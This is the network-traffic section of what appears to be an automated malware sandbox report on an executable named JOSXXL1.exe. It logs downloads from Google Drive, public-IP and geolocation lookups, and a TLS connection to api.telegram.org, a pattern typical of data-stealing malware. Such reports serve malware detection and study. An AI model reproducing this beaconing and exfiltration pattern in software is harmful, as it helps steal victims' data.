                                                                                                      Oct 26, 2024 23:57:16.782974958 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.782990932 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.783077002 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.783204079 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.783252001 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.783341885 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.783409119 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.783925056 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.783991098 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.784029961 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.784503937 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.784564018 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.784580946 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.784691095 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.784749985 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.784763098 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.784996986 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.785052061 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.838823080 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.838869095 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:17.681513071 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:17.687181950 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:17.687300920 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:17.687619925 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:17.693056107 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:18.357789993 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:18.363281012 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:18.368921995 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:18.523883104 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:18.573756933 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:18.864639044 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:18.864658117 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:18.864737034 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:18.868424892 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:18.868439913 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:19.512181997 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:19.512270927 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:19.515686035 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:19.515692949 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:19.516139030 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:19.520695925 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:19.563376904 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.189614058 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.189868927 CEST44361896188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.189963102 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:20.202786922 CEST61896443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:20.209976912 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:20.215368032 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.371098042 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.373280048 CEST61902443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:20.373341084 CEST44361902188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.373557091 CEST61902443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:20.373966932 CEST61902443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:20.374002934 CEST44361902188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.417495012 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:20.989067078 CEST44361902188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:20.991225958 CEST61902443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:20.991300106 CEST44361902188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.167928934 CEST44361902188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.168164968 CEST44361902188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.168718100 CEST61902443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:21.169251919 CEST61902443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:21.177961111 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:21.179596901 CEST6190880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:21.185007095 CEST8061908193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.185940981 CEST8061886193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.186036110 CEST6188680192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:21.186050892 CEST6190880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:21.186281919 CEST6190880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:21.191646099 CEST8061908193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.848947048 CEST8061908193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.856463909 CEST61913443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:21.856517076 CEST44361913188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.856623888 CEST61913443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:21.856858015 CEST61913443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:21.856880903 CEST44361913188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:21.890371084 CEST6190880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:22.473963976 CEST44361913188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.475940943 CEST61913443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:22.475984097 CEST44361913188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.626964092 CEST44361913188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.627208948 CEST44361913188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.627402067 CEST61913443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:22.627723932 CEST61913443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:22.632108927 CEST6190880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:22.633534908 CEST6191980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:22.638952017 CEST8061919193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.639051914 CEST6191980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:22.639153004 CEST6191980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:22.644499063 CEST8061919193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.650166988 CEST8061908193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:22.650252104 CEST6190880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:23.311886072 CEST8061919193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:23.313390017 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.313477039 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:23.313555956 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.313817978 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.313847065 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:23.355006933 CEST6191980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:23.975445032 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:23.977497101 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.977574110 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.129806995 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.130027056 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.130105972 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.135037899 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.141094923 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:24.147233009 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.147346973 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:24.147428989 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:24.152884007 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.929389954 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.940370083 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.940392017 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.940506935 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.945127964 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.945142031 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.980027914 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.559602022 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.561312914 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:25.561343908 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.708434105 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.708667040 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.708726883 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:25.709008932 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:25.712125063 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.713063955 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.718053102 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.718173027 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.718482971 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.718569994 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.718627930 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.724093914 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.380525112 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.381767035 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.381846905 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.381922007 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.382162094 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.382198095 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.433161974 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:26.995883942 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.997277975 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.997353077 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.149044037 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.149271965 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.149353027 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.149859905 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.153095007 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.153912067 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.158881903 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.158957958 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.159301043 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.159411907 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.159492970 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.164799929 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.838432074 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.851567030 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.851648092 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.851730108 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.852133036 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.852161884 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.886320114 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.477348089 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.479371071 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:28.479454994 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.624186993 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.624273062 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.624464035 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:28.624829054 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:28.628776073 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.629923105 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.634670973 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.634757042 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.635410070 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.635520935 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.635612011 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.641118050 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.307995081 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.309318066 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.309370041 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.309451103 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.309699059 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.309714079 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.355020046 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:29.933979034 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.935372114 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.935409069 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.079467058 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.079713106 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.080168962 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.080490112 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.083367109 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.089272022 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.089380026 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.092859030 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.098309040 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.098412037 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.098470926 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.104150057 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.792260885 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.793809891 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.793889046 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.793982983 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.794181108 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.794198990 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.839623928 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:31.407813072 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.409615040 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:31.409693003 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.552814007 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.553052902 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.553133011 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:31.553481102 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:31.586294889 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:31.593624115 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.593687057 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:31.598575115 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:31.598613977 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.598689079 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:31.598985910 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:31.599014044 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.473891973 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.473979950 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.475507021 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.475523949 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.475975037 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.477336884 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.523328066 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.724792957 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.724879980 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.724968910 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.729470968 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:38.719151020 CEST6191980192.168.2.4193.122.130.0

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 26, 2024 23:56:18.524009943 CEST53577891.1.1.1192.168.2.4
                                                                                                      Oct 26, 2024 23:57:10.401118040 CEST6066653192.168.2.41.1.1.1
                                                                                                      Oct 26, 2024 23:57:10.408746958 CEST53606661.1.1.1192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.775019884 CEST6410653192.168.2.41.1.1.1
                                                                                                      Oct 26, 2024 23:57:11.783696890 CEST53641061.1.1.1192.168.2.4
                                                                                                      Oct 26, 2024 23:57:17.668143034 CEST5194353192.168.2.41.1.1.1
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST53519431.1.1.1192.168.2.4
                                                                                                      Oct 26, 2024 23:57:18.856044054 CEST5994853192.168.2.41.1.1.1
                                                                                                      Oct 26, 2024 23:57:18.863738060 CEST53599481.1.1.1192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.083777905 CEST4954753192.168.2.41.1.1.1
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST53495471.1.1.1192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.586850882 CEST5272653192.168.2.41.1.1.1
                                                                                                      Oct 26, 2024 23:57:31.597981930 CEST53527261.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 26, 2024 23:57:10.401118040 CEST192.168.2.41.1.1.10xa8c7Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:11.775019884 CEST192.168.2.41.1.1.10x8e03Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.668143034 CEST192.168.2.41.1.1.10xcb4dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:18.856044054 CEST192.168.2.41.1.1.10xe470Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.083777905 CEST192.168.2.41.1.1.10x8de0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:31.586850882 CEST192.168.2.41.1.1.10xf94fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 26, 2024 23:57:10.408746958 CEST1.1.1.1192.168.2.40xa8c7No error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:11.783696890 CEST1.1.1.1192.168.2.40x8e03No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST1.1.1.1192.168.2.40xcb4dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST1.1.1.1192.168.2.40xcb4dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST1.1.1.1192.168.2.40xcb4dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST1.1.1.1192.168.2.40xcb4dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST1.1.1.1192.168.2.40xcb4dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:17.675543070 CEST1.1.1.1192.168.2.40xcb4dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:18.863738060 CEST1.1.1.1192.168.2.40xe470No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:18.863738060 CEST1.1.1.1192.168.2.40xe470No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST1.1.1.1192.168.2.40x8de0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST1.1.1.1192.168.2.40x8de0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST1.1.1.1192.168.2.40x8de0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST1.1.1.1192.168.2.40x8de0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST1.1.1.1192.168.2.40x8de0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:30.091801882 CEST1.1.1.1192.168.2.40x8de0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                      Oct 26, 2024 23:57:31.597981930 CEST1.1.1.1192.168.2.40xf94fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • drive.google.com
                                                                                                      • drive.usercontent.google.com
                                                                                                      • reallyfreegeoip.org
                                                                                                      • api.telegram.org
                                                                                                      • checkip.dyndns.org

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.461886193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:17.687619925 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 26, 2024 23:57:18.357789993 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 8f37fa3a8999698704edd3c5376de767
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
                                                                                                      Oct 26, 2024 23:57:18.363281012 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
